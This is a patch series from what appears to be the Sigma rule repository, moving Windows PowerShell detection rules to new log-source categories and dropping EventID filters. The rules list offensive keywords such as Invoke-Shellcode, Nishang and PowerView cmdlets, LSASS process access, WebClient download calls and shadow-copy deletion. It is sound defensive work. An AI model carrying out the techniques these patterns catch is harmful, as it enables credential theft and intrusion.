a/rules/windows/powershell/powershell_script/powershell_malicious_commandlets.yml b/rules/windows/powershell/powershell_script/powershell_malicious_commandlets.yml index 34c4ccb0..8b414ae9 100644 --- a/rules/windows/powershell/powershell_script/powershell_malicious_commandlets.yml +++ b/rules/windows/powershell/powershell_script/powershell_malicious_commandlets.yml @@ -10,14 +10,13 @@ tags: - attack.t1086 #an old one author: Sean Metcalf (source), Florian Roth (rule), Bartlomiej Czyz @bczyz1 (update), oscd.community (update) date: 2017/03/05 -modified: 2021/08/21 +modified: 2021/10/16 logsource: product: windows - service: powershell + category: ps_script definition: Script Block Logging must be enable detection: select_Malicious: - EventID: 4104 ScriptBlockText|contains: - "Invoke-DllInjection" - "Invoke-Shellcode" diff --git a/rules/windows/powershell/powershell_script/powershell_malicious_keywords.yml b/rules/windows/powershell/powershell_script/powershell_malicious_keywords.yml index 071f3725..c8c39243 100644 --- a/rules/windows/powershell/powershell_script/powershell_malicious_keywords.yml +++ b/rules/windows/powershell/powershell_script/powershell_malicious_keywords.yml @@ -10,14 +10,13 @@ tags: - attack.t1086 #an old one author: Sean Metcalf (source), Florian Roth (rule) date: 2017/03/05 -modified: 2021/08/21 +modified: 2021/10/16 logsource: product: windows - service: powershell + category: ps_script definition: 'It is recommended to use the new "Script Block Logging" of PowerShell v5 https://adsecurity.org/?p=2277' detection: Malicious: - EventID: 4104 ScriptBlockText|contains: - "AdjustTokenPrivileges" - "IMAGE_NT_OPTIONAL_HDR64_MAGIC" diff --git a/rules/windows/powershell/powershell_script/powershell_memorydump_getstoragediagnosticinfo.yml b/rules/windows/powershell/powershell_script/powershell_memorydump_getstoragediagnosticinfo.yml index 79ef1050..f4ec3937 100644 --- a/rules/windows/powershell/powershell_script/powershell_memorydump_getstoragediagnosticinfo.yml +++ b/rules/windows/powershell/powershell_script/powershell_memorydump_getstoragediagnosticinfo.yml @@ -3,6 +3,7 @@ id: cd185561-4760-45d6-a63e-a51325112cae status: experimental description: Detects usage of a PowerShell command to dump the live memory of a Windows machine date: 2021/09/21 +modified: 2021/10/16 references: - https://docs.microsoft.com/en-us/powershell/module/storage/get-storagediagnosticinfo tags: @@ -10,11 +11,10 @@ tags: author: Max Altgelt logsource: product: windows - service: powershell + category: ps_script definition: Script block logging must be enabled detection: dump: - EventID: 4104 ScriptBlockText|contains|all: - 'Get-StorageDiagnosticInfo' - '-IncludeLiveDump' diff --git a/rules/windows/powershell/powershell_script/powershell_nishang_malicious_commandlets.yml b/rules/windows/powershell/powershell_script/powershell_nishang_malicious_commandlets.yml index 90b3e7a7..91dda505 100644 --- a/rules/windows/powershell/powershell_script/powershell_nishang_malicious_commandlets.yml +++ b/rules/windows/powershell/powershell_script/powershell_nishang_malicious_commandlets.yml @@ -3,7 +3,7 @@ id: f772cee9-b7c2-4cb2-8f07-49870adc02e0 status: experimental description: Detects Commandlet names and arguments from the Nishang exploitation framework date: 2019/05/16 -modified: 2021/08/21 +modified: 2021/10/16 references: - https://github.com/samratashok/nishang tags: @@ -13,11 +13,10 @@ tags: author: Alec Costello logsource: product: windows - service: powershell + category: ps_script definition: Script block logging must be enabled detection: Nishang: - EventID: 4104 ScriptBlockText|contains: - Add-ConstrainedDelegationBackdoor - Set-DCShadowPermissions diff --git a/rules/windows/powershell/powershell_script/powershell_ntfs_ads_access.yml b/rules/windows/powershell/powershell_script/powershell_ntfs_ads_access.yml index 1c6f3018..f298d3d4 100644 --- a/rules/windows/powershell/powershell_script/powershell_ntfs_ads_access.yml +++ b/rules/windows/powershell/powershell_script/powershell_ntfs_ads_access.yml @@ -14,14 +14,12 @@ tags: - attack.t1086 # an old one author: Sami Ruohonen date: 2018/07/24 -modified: 2021/08/21 +modified: 2021/10/16 logsource: product: windows - service: powershell + category: ps_script definition: Script block logging must be enabled detection: - event: - EventID: 4104 content: ScriptBlockText|contains: - "set-content" diff --git a/rules/windows/powershell/powershell_script/powershell_powerview_malicious_commandlets.yml b/rules/windows/powershell/powershell_script/powershell_powerview_malicious_commandlets.yml index 1b2b7454..d72b29a3 100644 --- a/rules/windows/powershell/powershell_script/powershell_powerview_malicious_commandlets.yml +++ b/rules/windows/powershell/powershell_script/powershell_powerview_malicious_commandlets.yml @@ -3,7 +3,7 @@ id: dcd74b95-3f36-4ed9-9598-0490951643aa status: experimental description: Detects Commandlet names from PowerView of PowerSploit exploitation framework. date: 2021/05/18 -modified: 2021/08/21 +modified: 2021/10/16 references: - https://powersploit.readthedocs.io/en/stable/Recon/README - https://github.com/PowerShellMafia/PowerSploit/tree/master/Recon @@ -15,11 +15,10 @@ tags: author: Bhabesh Raj logsource: product: windows - service: powershell + category: ps_script definition: Script Block Logging must be enable detection: selection: - EventID: 4104 ScriptBlockText|contains: - Export-PowerViewCSV - Get-IPAddress diff --git a/rules/windows/powershell/powershell_script/powershell_prompt_credentials.yml b/rules/windows/powershell/powershell_script/powershell_prompt_credentials.yml index b3d5e713..a795e8d1 100644 --- a/rules/windows/powershell/powershell_script/powershell_prompt_credentials.yml +++ b/rules/windows/powershell/powershell_script/powershell_prompt_credentials.yml @@ -12,14 +12,13 @@ tags: - attack.t1086 # an old one author: John Lambert (idea), Florian Roth (rule) date: 2017/04/09 -modified: 2021/08/04 +modified: 2021/10/16 logsource: product: windows - service: powershell + category: ps_script definition: Script block logging must be enabled detection: selection: - EventID: 4104 ScriptBlockText|contains: 'PromptForCredential' condition: selection falsepositives: diff --git a/rules/windows/powershell/powershell_script/powershell_psattack.yml b/rules/windows/powershell/powershell_script/powershell_psattack.yml index 8e178cb4..12144627 100644 --- a/rules/windows/powershell/powershell_script/powershell_psattack.yml +++ b/rules/windows/powershell/powershell_script/powershell_psattack.yml @@ -10,14 +10,13 @@ tags: - attack.t1086 #an old one author: Sean Metcalf (source), Florian Roth (rule) date: 2017/03/05 -modified: 2021/08/21 +modified: 2021/10/16 logsource: product: windows - service: powershell + category: ps_script definition: Script block logging must be enabled detection: selection: - EventID: 4104 ScriptBlockText|contains: 'PS ATTACK!!!' condition: selection falsepositives: diff --git a/rules/windows/powershell/powershell_script/powershell_shellcode_b64.yml b/rules/windows/powershell/powershell_script/powershell_shellcode_b64.yml index 45ea2909..9cad56ae 100644 --- a/rules/windows/powershell/powershell_script/powershell_shellcode_b64.yml +++ b/rules/windows/powershell/powershell_script/powershell_shellcode_b64.yml @@ -13,14 +13,13 @@ tags: - attack.t1086 #an old one author: David Ledbetter (shellcode), Florian Roth (rule) date: 2018/11/17 -modified: 2020/12/01 +modified: 2021/10/16 logsource: product: windows - service: powershell + category: ps_script definition: Script block logging must be enabled detection: selection: - EventID: 4104 ScriptBlockText|contains: 'AAAAYInlM' selection2: ScriptBlockText|contains: diff --git a/rules/windows/powershell/powershell_script/powershell_shellintel_malicious_commandlets.yml b/rules/windows/powershell/powershell_script/powershell_shellintel_malicious_commandlets.yml index 62dfb25f..3dd0824c 100644 --- a/rules/windows/powershell/powershell_script/powershell_shellintel_malicious_commandlets.yml +++ b/rules/windows/powershell/powershell_script/powershell_shellintel_malicious_commandlets.yml @@ -3,7 +3,7 @@ id: 402e1e1d-ad59-47b6-bf80-1ee44985b3a7 status: experimental description: Detects Commandlet names from ShellIntel exploitation scripts. date: 2021/08/09 -modified: 2021/08/21 +modified: 2021/10/16 references: - https://github.com/Shellntel/scripts/ tags: @@ -12,11 +12,10 @@ tags: author: Max Altgelt, Tobias Michalski logsource: product: windows - service: powershell + category: ps_script definition: Script Block Logging must be enable detection: selection: - EventID: 4104 ScriptBlockText|contains: - Invoke-SMBAutoBrute - Invoke-GPOLinks diff --git a/rules/windows/powershell/powershell_script/powershell_store_file_in_alternate_data_stream.yml b/rules/windows/powershell/powershell_script/powershell_store_file_in_alternate_data_stream.yml index 070ace3c..c299fe7e 100644 --- a/rules/windows/powershell/powershell_script/powershell_store_file_in_alternate_data_stream.yml +++ b/rules/windows/powershell/powershell_script/powershell_store_file_in_alternate_data_stream.yml @@ -3,6 +3,7 @@ id: a699b30e-d010-46c8-bbd1-ee2e26765fe9 status: experimental author: frack113 date: 2021/09/02 +modified: 2021/10/16 description: Storing files in Alternate Data Stream (ADS) similar to Astaroth malware. references: - https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.004/T1564.004.md @@ -11,18 +12,16 @@ tags: - attack.t1564.004 logsource: product: windows - service: powershell + category: ps_script definition: EnableScriptBlockLogging must be set to enable detection: - selection_id: - EventID: 4104 selection_compspec: ScriptBlockText|contains|all: - 'Start-Process' - '-FilePath "$env:comspec" ' - '-ArgumentList ' - '>' - condition: selection_id and selection_compspec + condition: selection_compspec falsepositives: - Unknown level: medium \ No newline at end of file diff --git a/rules/windows/powershell/powershell_script/powershell_susp_zip_compress_in_scriptblocktext.yml b/rules/windows/powershell/powershell_script/powershell_susp_zip_compress_in_scriptblocktext.yml index 1073d0a1..8053fe55 100644 --- a/rules/windows/powershell/powershell_script/powershell_susp_zip_compress_in_scriptblocktext.yml +++ b/rules/windows/powershell/powershell_script/powershell_susp_zip_compress_in_scriptblocktext.yml @@ -3,7 +3,7 @@ id: b7a3c9a3-09ea-4934-8864-6a32cacd98d9 status: experimental author: frack113 date: 2021/07/20 -modified: 2021/10/09 +modified: 2021/10/16 description: Use living off the land tools to zip a file and stage it in the Windows temporary folder for later exfiltration references: - https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1074.001/T1074.001.md @@ -12,11 +12,10 @@ tags: - attack.t1074.001 logsource: product: windows - service: powershell + category: ps_script definition: Script Block Logging must be enable detection: selection_4104: - EventID: 4104 ScriptBlockText|contains|all: - 'Compress-Archive ' - ' -Path ' diff --git a/rules/windows/powershell/powershell_script/powershell_suspicious_export_pfxcertificate.yml b/rules/windows/powershell/powershell_script/powershell_suspicious_export_pfxcertificate.yml index b39cf109..0f99583d 100644 --- a/rules/windows/powershell/powershell_script/powershell_suspicious_export_pfxcertificate.yml +++ b/rules/windows/powershell/powershell_script/powershell_suspicious_export_pfxcertificate.yml @@ -13,11 +13,10 @@ date: 2021/04/23 modified: 2021/08/04 logsource: product: windows - service: powershell + category: ps_script definition: Script Block Logging must be enable detection: PfxCertificate: - EventID: 4104 ScriptBlockText|contains: "Export-PfxCertificate" condition: PfxCertificate falsepositives: diff --git a/rules/windows/powershell/powershell_script/powershell_suspicious_getprocess_lsass.yml b/rules/windows/powershell/powershell_script/powershell_suspicious_getprocess_lsass.yml index eccd3337..2af43b59 100644 --- a/rules/windows/powershell/powershell_script/powershell_suspicious_getprocess_lsass.yml +++ b/rules/windows/powershell/powershell_script/powershell_suspicious_getprocess_lsass.yml @@ -9,14 +9,13 @@ tags: - attack.t1003.001 author: Florian Roth date: 2021/04/23 -modified: 2021/08/04 +modified: 2021/10/16 logsource: product: windows - service: powershell + category: ps_script definition: Script Block Logging must be enable detection: select_LSASS: - EventID: 4104 ScriptBlockText|contains: 'Get-Process lsass' condition: select_LSASS falsepositives: diff --git a/rules/windows/powershell/powershell_script/powershell_suspicious_keywords.yml b/rules/windows/powershell/powershell_script/powershell_suspicious_keywords.yml index 17910236..a37fa3fe 100644 --- a/rules/windows/powershell/powershell_script/powershell_suspicious_keywords.yml +++ b/rules/windows/powershell/powershell_script/powershell_suspicious_keywords.yml @@ -3,7 +3,7 @@ id: 1f49f2ab-26bc-48b3-96cc-dcffbc93eadf status: experimental description: Detects keywords that could indicate the use of some PowerShell exploitation framework date: 2019/02/11 -modified: 2021/08/30 +modified: 2021/10/16 author: Florian Roth, Perez Diego (@darkquassar) references: - https://posts.specterops.io/entering-a-covenant-net-command-and-control-e11038bcf462 @@ -16,11 +16,10 @@ tags: - attack.t1086 #an old one logsource: product: windows - service: powershell + category: ps_script definition: Script block logging must be enabled for 4104 detection: framework: - EventID: 4104 ScriptBlockText|contains: - "System.Reflection.Assembly.Load($" - "[System.Reflection.Assembly]::Load($" diff --git a/rules/windows/powershell/powershell_script/powershell_suspicious_mail_acces.yml b/rules/windows/powershell/powershell_script/powershell_suspicious_mail_acces.yml index 18b6b460..b89413bb 100644 --- a/rules/windows/powershell/powershell_script/powershell_suspicious_mail_acces.yml +++ b/rules/windows/powershell/powershell_script/powershell_suspicious_mail_acces.yml @@ -3,6 +3,7 @@ id: 2837e152-93c8-43d2-85ba-c3cd3c2ae614 status: experimental author: frack113 date: 2021/07/21 +modified: 2021/10/16 description: Adversaries may target user email on local systems to collect sensitive information. Files containing email data can be acquired from a user’s local system, such as Outlook storage or cache files. references: - https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1114.001/T1114.001.md @@ -11,11 +12,10 @@ tags: - attack.t1114.001 logsource: product: windows - service: powershell + category: ps_script definition: Script block logging must be enabled detection: selection: - EventID: 4104 ScriptBlockText|contains: - 'Get-Inbox.ps1' - 'Microsoft.Office.Interop.Outlook' diff --git a/rules/windows/powershell/powershell_script/powershell_suspicious_mounted_share_deletion.yml b/rules/windows/powershell/powershell_script/powershell_suspicious_mounted_share_deletion.yml index 941ef606..968a3d47 100644 --- a/rules/windows/powershell/powershell_script/powershell_suspicious_mounted_share_deletion.yml +++ b/rules/windows/powershell/powershell_script/powershell_suspicious_mounted_share_deletion.yml @@ -6,16 +6,16 @@ references: - https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.005/T1070.005.md author: 'oscd.community, @redcanary, Zach Stanford @svch0st' date: 2020/10/08 +modified: 2021/10/16 tags: - attack.defense_evasion - attack.t1070.005 logsource: product: windows - service: powershell + category: ps_script definition: Script block logging must be enabled detection: selection: - EventID: 4104 ScriptBlockText|contains: - 'Remove-SmbShare' - 'Remove-FileShare' diff --git a/rules/windows/powershell/powershell_script/powershell_suspicious_recon.yml b/rules/windows/powershell/powershell_script/powershell_suspicious_recon.yml index a46b1d1b..d7468b44 100644 --- a/rules/windows/powershell/powershell_script/powershell_suspicious_recon.yml +++ b/rules/windows/powershell/powershell_script/powershell_suspicious_recon.yml @@ -3,6 +3,7 @@ id: a9723fcc-881c-424c-8709-fd61442ab3c3 status: experimental author: frack113 date: 2021/07/30 +modified: 2021/10/16 description: Once established within a system or network, an adversary may use automated techniques for collecting internal data references: - https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1119/T1119.md @@ -11,11 +12,9 @@ tags: - attack.t1119 logsource: product: windows - service: powershell + category: ps_script definition: Script block logging must be enabled detection: - selection_eventid: - EventID: 4104 selection_action: ScriptBlockText|contains: - 'Get-Service ' diff --git a/rules/windows/powershell/powershell_script/powershell_suspicious_win32_pnpentity.yml b/rules/windows/powershell/powershell_script/powershell_suspicious_win32_pnpentity.yml index 3cf7777d..55ce58dd 100644 --- a/rules/windows/powershell/powershell_script/powershell_suspicious_win32_pnpentity.yml +++ b/rules/windows/powershell/powershell_script/powershell_suspicious_win32_pnpentity.yml @@ -3,6 +3,7 @@ id: b26647de-4feb-4283-af6b-6117661283c5 status: experimental author: frack113 date: 2021/08/23 +modified: 2021/10/16 description: Adversaries may attempt to gather information about attached peripheral devices and components connected to a computer system. references: - https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1120/T1120.md @@ -11,11 +12,10 @@ tags: - attack.t1120 logsource: product: windows - service: powershell + category: ps_script definition: EnableScriptBlockLogging must be set to enable detection: selection: - EventID: 4104 ScriptBlockText|contains: Win32_PnPEntity condition: selection falsepositives: diff --git a/rules/windows/powershell/powershell_script/powershell_timestomp.yml b/rules/windows/powershell/powershell_script/powershell_timestomp.yml index 5c53560c..b87e3354 100644 --- a/rules/windows/powershell/powershell_script/powershell_timestomp.yml +++ b/rules/windows/powershell/powershell_script/powershell_timestomp.yml @@ -3,6 +3,7 @@ id: c6438007-e081-42ce-9483-b067fbef33c3 status: experimental author: frack113 date: 2021/08/03 +modified: 2021/10/16 description: Adversaries may modify file time attributes to hide new or changes to existing files. Timestomping is a technique that modifies the timestamps of a file (the modify, access, create, and change times), often to mimic files that are in the same folder. references: - https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.006/T1070.006.md @@ -12,11 +13,9 @@ tags: - attack.t1070.006 logsource: product: windows - service: powershell + category: ps_script definition: EnableScriptBlockLogging must be set to enable detection: - selection_id: - EventID: 4104 selection_ioc: ScriptBlockText|contains: - '.CreationTime =' @@ -25,7 +24,7 @@ detection: - '[IO.File]::SetCreationTime' - '[IO.File]::SetLastAccessTime' - '[IO.File]::SetLastWriteTime' - condition: selection_id and selection_ioc + condition: selection_ioc falsepositives: - legitime admin script level: medium diff --git a/rules/windows/powershell/powershell_script/powershell_trigger_profiles.yml b/rules/windows/powershell/powershell_script/powershell_trigger_profiles.yml index 58321ba2..99083248 100644 --- a/rules/windows/powershell/powershell_script/powershell_trigger_profiles.yml +++ b/rules/windows/powershell/powershell_script/powershell_trigger_profiles.yml @@ -3,6 +3,7 @@ id: 05b3e303-faf0-4f4a-9b30-46cc13e69152 status: experimental author: frack113 date: 2021/08/18 +modified: 2021/10/16 description: Adversaries may gain persistence and elevate privileges by executing malicious content triggered by PowerShell profiles. references: - https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.013/T1546.013.md @@ -11,11 +12,10 @@ tags: - attack.t1546.013 logsource: product: windows - service: powershell + category: ps_script definition: EnableScriptBlockLogging must be set to enable detection: selection: - EventID: 4104 ScriptBlockText|contains|all: - 'Add-Content' - '$profile' diff --git a/rules/windows/powershell/powershell_script/powershell_web_request.yml b/rules/windows/powershell/powershell_script/powershell_web_request.yml index fb66db23..2a6ff8e3 100644 --- a/rules/windows/powershell/powershell_script/powershell_web_request.yml +++ b/rules/windows/powershell/powershell_script/powershell_web_request.yml @@ -10,18 +10,17 @@ references: - https://blog.jourdant.me/post/3-ways-to-download-files-with-powershell author: James Pemberton / @4A616D6573 date: 2019/10/24 -modified: 2021/09/21 +modified: 2021/10/16 tags: - attack.execution - attack.t1059.001 - attack.t1086 #an old one logsource: product: windows - service: powershell + category: ps_script definition: 'Script block logging must be enabled' detection: selection: - EventID: 4104 ScriptBlockText|contains: - 'Invoke-WebRequest' - 'iwr ' diff --git a/rules/windows/powershell/powershell_script/powershell_windows_firewall_profile_disabled.yml b/rules/windows/powershell/powershell_script/powershell_windows_firewall_profile_disabled.yml index eb7f1ed0..db494165 100644 --- a/rules/windows/powershell/powershell_script/powershell_windows_firewall_profile_disabled.yml +++ b/rules/windows/powershell/powershell_script/powershell_windows_firewall_profile_disabled.yml @@ -4,6 +4,7 @@ description: Detects when a user disables the Windows Firewall via a Profile to status: experimental author: Austin Songer @austinsonger date: 2021/10/12 +modified: 2021/10/16 references: - https://docs.microsoft.com/en-us/powershell/module/netsecurity/set-netfirewallprofile?view=windowsserver2019-ps - https://www.tutorialspoint.com/how-to-get-windows-firewall-profile-settings-using-powershell @@ -11,10 +12,9 @@ references: - http://woshub.com/manage-windows-firewall-powershell/ logsource: product: windows - service: powershell + category: ps_script detection: selection: - EventID: 4104 ScriptBlockText|contains|all: - Set-NetFirewallProfile - -Profile diff --git a/rules/windows/powershell/powershell_script/powershell_winlogon_helper_dll.yml b/rules/windows/powershell/powershell_script/powershell_winlogon_helper_dll.yml index d15724be..9054932c 100644 --- a/rules/windows/powershell/powershell_script/powershell_winlogon_helper_dll.yml +++ b/rules/windows/powershell/powershell_script/powershell_winlogon_helper_dll.yml @@ -4,16 +4,15 @@ status: experimental description: Winlogon.exe is a Windows component responsible for actions at logon/logoff as well as the secure attention sequence (SAS) triggered by Ctrl-Alt-Delete. Registry entries in HKLM\Software[Wow6432Node]Microsoft\Windows NT\CurrentVersion\Winlogon\ and HKCU\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\ are used to manage additional helper programs and functionalities that support Winlogon. Malicious modifications to these Registry keys may cause Winlogon to load and execute malicious DLLs and/or executables. author: Timur Zinniatullin, oscd.community date: 2019/10/21 -modified: 2020/12/01 +modified: 2021/10/16 references: - https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.004/T1547.004.md logsource: product: windows - service: powershell + category: ps_script definition: Script block logging must be enabled detection: selection: - EventID: 4104 ScriptBlockText|contains: 'CurrentVersion\Winlogon' selection2: ScriptBlockText|contains: diff --git a/rules/windows/powershell/powershell_script/powershell_wmi_persistence.yml b/rules/windows/powershell/powershell_script/powershell_wmi_persistence.yml index 03fa7e18..65677d9d 100644 --- a/rules/windows/powershell/powershell_script/powershell_wmi_persistence.yml +++ b/rules/windows/powershell/powershell_script/powershell_wmi_persistence.yml @@ -3,6 +3,7 @@ id: 9e07f6e7-83aa-45c6-998e-0af26efd0a85 status: experimental author: frack113 date: 2021/08/19 +modified: 2021/10/16 description: Adversaries may establish persistence and elevate privileges by executing malicious content triggered by a Windows Management Instrumentation (WMI) event subscription. references: - https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.003/T1546.003.md @@ -12,11 +13,9 @@ tags: - attack.t1546.003 logsource: product: windows - service: powershell + category: ps_script definition: EnableScriptBlockLogging must be set to enable detection: - selection_id: - EventID: 4104 selection_ioc: - ScriptBlockText|contains|all: - 'New-CimInstance ' @@ -28,7 +27,7 @@ detection: - '-Namespace root/subscription ' - '-ClassName CommandLineEventConsumer ' - '-Property ' #is a variable name - condition: selection_id and selection_ioc + condition: selection_ioc falsepositives: - Unknown level: medium \ No newline at end of file diff --git a/rules/windows/powershell/powershell_script/powershell_wmimplant.yml b/rules/windows/powershell/powershell_script/powershell_wmimplant.yml index 9ed475bd..cc59e934 100644 --- a/rules/windows/powershell/powershell_script/powershell_wmimplant.yml +++ b/rules/windows/powershell/powershell_script/powershell_wmimplant.yml @@ -11,14 +11,13 @@ tags: - attack.t1086 #an old one author: NVISO date: 2020/03/26 -modified: 2021/08/30 +modified: 2021/10/16 logsource: product: windows - service: powershell + category: ps_script definition: Script block logging must be enabled detection: selection: - EventID: 4104 ScriptBlockText|contains: - "WMImplant" - " change_user " From 690b26fb90e16f8355b5949a316e17685b660803 Mon Sep 17 00:00:00 2001 From: frack113 Date: Sat, 16 Oct 2021 08:19:25 +0200 Subject: [PATCH 1249/1367] change order to chain sysmon --- tools/config/generic/powershell.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/tools/config/generic/powershell.yml b/tools/config/generic/powershell.yml index 6f8f3828..30d56127 100644 --- a/tools/config/generic/powershell.yml +++ b/tools/config/generic/powershell.yml @@ -1,5 +1,5 @@ title: Conversion of Generic Rules into Powershell Specific EventID Rules -order: 10 +order: 15 logsources: ps_module: category: ps_module From 4149fa8632412362b6ec1cb8a1cfba8155af5c3a Mon Sep 17 00:00:00 2001 From: frack113 Date: Sat, 16 Oct 2021 08:26:51 +0200 Subject: [PATCH 1250/1367] change to category: ps_classic_* --- .../powershell_classic_alternate_powershell_hosts.yml | 5 ++--- .../powershell_classic/powershell_classic_powercat.yml | 5 ++--- .../powershell_classic_remote_powershell_session.yml | 5 ++--- .../powershell_classic_suspicious_download.yml | 6 ++---- .../powershell_delete_volume_shadow_copies.yml | 8 +++----- .../powershell_classic/powershell_downgrade_attack.yml | 4 ++-- .../powershell_classic/powershell_exe_calling_ps.yml | 4 ++-- .../powershell_classic/powershell_renamed_powershell.yml | 5 ++--- .../powershell_tamper_with_windows_defender.yml | 8 +++----- .../powershell_classic/powershell_xor_commandline.yml | 5 ++--- 10 files changed, 22 insertions(+), 33 deletions(-) diff --git a/rules/windows/powershell/powershell_classic/powershell_classic_alternate_powershell_hosts.yml b/rules/windows/powershell/powershell_classic/powershell_classic_alternate_powershell_hosts.yml index 154ddfde..1ba70f71 100644 --- a/rules/windows/powershell/powershell_classic/powershell_classic_alternate_powershell_hosts.yml +++ b/rules/windows/powershell/powershell_classic/powershell_classic_alternate_powershell_hosts.yml @@ -6,7 +6,7 @@ related: description: Detects alternate PowerShell hosts potentially bypassing detections looking for powershell.exe status: test date: 2019/08/11 -modified: 2021/09/21 +modified: 2021/10/16 author: Roberto Rodriguez @Cyb3rWard0g references: - https://threathunterplaybook.com/notebooks/windows/02_execution/WIN-190815181010.html @@ -16,11 +16,10 @@ tags: - attack.t1086 # an old one logsource: product: windows - service: powershell-classic + category: ps_classic_start definition: fields have to be extract from event detection: selection: - EventID: 400 HostApplication: '*' filter: HostApplication|startswith: 'C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe' diff --git a/rules/windows/powershell/powershell_classic/powershell_classic_powercat.yml b/rules/windows/powershell/powershell_classic/powershell_classic_powercat.yml index 3ef28100..b9e8c6e7 100644 --- a/rules/windows/powershell/powershell_classic/powershell_classic_powercat.yml +++ b/rules/windows/powershell/powershell_classic/powershell_classic_powercat.yml @@ -6,7 +6,7 @@ related: status: experimental author: frack113 date: 2021/07/21 -modified: 2021/09/07 +modified: 2021/10/16 description: Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network references: - https://nmap.org/ncat/ @@ -17,11 +17,10 @@ tags: - attack.t1095 logsource: product: windows - service: powershell-classic + category: ps_classic_start definition: fields have to be extract from event detection: selection: - EventID: 400 HostApplication|contains: - 'powercat ' - 'powercat.ps1' diff --git a/rules/windows/powershell/powershell_classic/powershell_classic_remote_powershell_session.yml b/rules/windows/powershell/powershell_classic/powershell_classic_remote_powershell_session.yml index d720d95d..8605312d 100644 --- a/rules/windows/powershell/powershell_classic/powershell_classic_remote_powershell_session.yml +++ b/rules/windows/powershell/powershell_classic/powershell_classic_remote_powershell_session.yml @@ -6,7 +6,7 @@ related: description: Detects remote PowerShell sessions status: test date: 2019/08/10 -modified: 2021/09/21 +modified: 2021/10/16 author: Roberto Rodriguez @Cyb3rWard0g references: - https://threathunterplaybook.com/notebooks/windows/02_execution/WIN-190511223310.html @@ -19,11 +19,10 @@ tags: - attack.t1028 # an old one logsource: product: windows - service: powershell-classic + category: ps_classic_start definition: fields have to be extract from event detection: selection: - EventID: 400 HostName: 'ServerRemoteHost' HostApplication|contains: 'wsmprovhost.exe' condition: selection diff --git a/rules/windows/powershell/powershell_classic/powershell_classic_suspicious_download.yml b/rules/windows/powershell/powershell_classic/powershell_classic_suspicious_download.yml index 5560edef..551b1b68 100644 --- a/rules/windows/powershell/powershell_classic/powershell_classic_suspicious_download.yml +++ b/rules/windows/powershell/powershell_classic/powershell_classic_suspicious_download.yml @@ -11,19 +11,17 @@ tags: - attack.t1086 #an old one author: Florian Roth date: 2017/03/05 -modified: 2021/09/21 +modified: 2021/10/16 logsource: product: windows - service: powershell-classic + category: ps_classic_start definition: fields have to be extract from event detection: downloadfile: - EventID: 400 # get 400 ,403 and 600 for 1 execution HostApplication|contains|all: - 'System.Net.WebClient' - '.DownloadFile(' downloadstring: - EventID: 400 HostApplication|contains|all: - 'System.Net.WebClient' - '.DownloadString(' diff --git a/rules/windows/powershell/powershell_classic/powershell_delete_volume_shadow_copies.yml b/rules/windows/powershell/powershell_classic/powershell_delete_volume_shadow_copies.yml index a496ed90..039b436e 100644 --- a/rules/windows/powershell/powershell_classic/powershell_delete_volume_shadow_copies.yml +++ b/rules/windows/powershell/powershell_classic/powershell_delete_volume_shadow_copies.yml @@ -11,10 +11,10 @@ tags: status: experimental author: frack113 date: 2021/06/03 -modified: 2021/08/28 +modified: 2021/10/16 logsource: product: windows - service: powershell-classic + category: ps_classic_start definition: fields have to be extract from event detection: selection_obj: @@ -25,9 +25,7 @@ detection: HostApplication|contains: - 'Delete()' - 'Remove-WmiObject' - selection_eventid: - EventID: 400 - condition: selection_obj and selection_del and selection_eventid + condition: selection_obj and selection_del fields: - HostApplication falsepositives: diff --git a/rules/windows/powershell/powershell_classic/powershell_downgrade_attack.yml b/rules/windows/powershell/powershell_classic/powershell_downgrade_attack.yml index 8ace36f2..6ab90c2c 100644 --- a/rules/windows/powershell/powershell_classic/powershell_downgrade_attack.yml +++ b/rules/windows/powershell/powershell_classic/powershell_downgrade_attack.yml @@ -11,13 +11,13 @@ tags: - attack.t1086 # an old one author: Florian Roth (rule), Lee Holmes (idea), Harish Segar (improvements) date: 2017/03/22 +modified: 2021/10/16 logsource: product: windows - service: powershell-classic + category: ps_classic_start definition: fields have to be extract from event detection: selection: - EventID: 400 EngineVersion|startswith: '2.' filter: HostVersion|startswith: '2.' diff --git a/rules/windows/powershell/powershell_classic/powershell_exe_calling_ps.yml b/rules/windows/powershell/powershell_classic/powershell_exe_calling_ps.yml index 95749b73..4c4ddb2d 100644 --- a/rules/windows/powershell/powershell_classic/powershell_exe_calling_ps.yml +++ b/rules/windows/powershell/powershell_classic/powershell_exe_calling_ps.yml @@ -11,13 +11,13 @@ tags: - attack.t1086 # an old one author: Sean Metcalf (source), Florian Roth (rule) date: 2017/03/05 +modified: 2021/10/16 logsource: product: windows - service: powershell-classic + category: ps_classic_start definition: fields have to be extract from event detection: selection1: - EventID: 400 EngineVersion|startswith: - '2.' - '4.' diff --git a/rules/windows/powershell/powershell_classic/powershell_renamed_powershell.yml b/rules/windows/powershell/powershell_classic/powershell_renamed_powershell.yml index d0d732e1..95a2be97 100644 --- a/rules/windows/powershell/powershell_classic/powershell_renamed_powershell.yml +++ b/rules/windows/powershell/powershell_classic/powershell_renamed_powershell.yml @@ -6,18 +6,17 @@ references: - https://speakerdeck.com/heirhabarov/hunting-for-powershell-abuse author: Harish Segar, frack113 date: 2020/06/29 -modified: 2021/08/18 +modified: 2021/10/16 tags: - attack.execution - attack.t1086 # an old one - attack.t1059.001 logsource: product: windows - service: powershell-classic + category: ps_classic_start definition: fields have to be extract from event detection: selection: - EventID: 400 HostName: ConsoleHost filter: HostApplication|startswith: diff --git a/rules/windows/powershell/powershell_classic/powershell_tamper_with_windows_defender.yml b/rules/windows/powershell/powershell_classic/powershell_tamper_with_windows_defender.yml index 3f32386d..896fbea5 100644 --- a/rules/windows/powershell/powershell_classic/powershell_tamper_with_windows_defender.yml +++ b/rules/windows/powershell/powershell_classic/powershell_tamper_with_windows_defender.yml @@ -9,17 